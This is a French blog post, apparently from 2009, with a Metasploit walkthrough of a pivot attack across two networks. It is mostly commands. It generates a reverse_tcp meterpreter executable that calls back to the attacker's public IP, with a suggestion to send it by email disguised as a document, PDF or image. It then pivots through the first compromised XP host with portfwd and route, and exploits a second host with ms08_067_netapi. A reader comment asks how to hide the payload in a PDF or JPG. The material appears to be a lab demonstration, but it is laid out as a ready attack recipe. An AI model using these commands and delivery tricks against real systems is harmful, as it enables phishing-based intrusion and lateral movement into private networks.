samedi 13 juin 2009

Meterpreter attack pivot [video]

meterpreter - portfwd from ne0matrix on Vimeo.



----------------------------------------------
network 1 (wifi)
R1: xx.xx.xx.xx (public IP)
NAT overload + static PAT (53, 69, 4444, 4445)
A: Laptop BT 192.168.1.8 (attacker)
----------------------------------------------
network 2
R2: NAT overload (firewall)
B: Desktop XPsp2 192.168.1.67 (target1 - pivot)
C: Laptop XPsp3 192.168.1.66 (target2)
----------------------------------------------
A ==wifi==> * R1 * ---internet--> * R2 * ==wire==> + B + ==wire==> C

----------------------------------------------
----------------------------------------------
ATTAQUE 1 (B)

Envoi par email(par ex) d'un fichier douteux (.doc-macrovba, .pdf, .jpg, etc....) qui éxécute un payload reverse tcp.

msfpayload windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 X > reverse.exe
#pour la démonstration, on a transféré le fichier via tftp
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 4444
exploit
#B éxécute reverse.exe ==> 1ere séssion meterpreter

----------------------------------------------
CONFIGURATION PIVOT sur B

portfwd add -L 127.0.0.1 -l 4445 -r 192.168.1.66 -p 445
background
route add 192.168.1.66 255.255.255.255 1
#1 étant le numéro de la séssion


----------------------------------------------
ATTAQUE 2 (C)
use windows/smb/ms08_067_netapi
set RHOST 192.168.1.66
set RPORT 445
set payload windows/meterpreter/bind_tcp
set LPORT 4445
exploit
#2e séssion meterpreter

4 commentaires:

  1. Excellent Write-up!

    Thanks

    RépondreSupprimer
  2. Merci pour la video

    pour ce qui est de l'etape :

    ATTAQUE 1 (B)
    Envoi par email(par ex) d'un fichier douteux (.doc-macrovba, .pdf, .jpg, etc....) qui éxécute un payload reverse tcp.

    Comment faire pour envoyer en PDF ou bien Jpg ?

    RépondreSupprimer
  3. http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Sutton.pdf

    RépondreSupprimer
  4. merci pour tes videos , t'es génial ;)

    RépondreSupprimer